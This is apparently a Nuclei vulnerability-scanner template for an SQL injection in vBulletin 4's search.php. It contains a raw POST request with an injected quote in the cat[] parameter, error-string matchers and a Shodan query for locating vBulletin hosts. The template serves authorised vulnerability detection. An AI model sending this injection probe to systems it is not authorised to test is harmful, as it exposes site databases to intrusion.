id: vbulletin-search-sqli info: name: vBulletin `Search.php` - SQL Injection author: MaStErChO severity: high description: | vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server. remediation: Upgrade to the latest version of vBulletin. reference: - https://www.exploit-db.com/exploits/17314 - https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/ classification: cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vbulletin product: vbulletin shodan-query: http.component:"vBulletin" tags: vbulletin,sqli http: - raw: - | POST /search.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded contenttypeid=7&do=process&humanverify=1&cat[]=-1%27 host-redirects: true max-redirects: 3 matchers-condition: and matchers: - type: word part: body words: - "type=dberror" - "MySQL Error" condition: and - type: status status: - 200 - 503 condition: or # digest: 4a0a0047304502202e8081071b7625238ca8562d03ebf37c0e7511678233fba4de000597eb11151f022100d98ef2bc4c94f6cc6b12a13424b736ea040611682077430c0c5cc48746d542aa:922c64590222798bb761d5b6d8e72950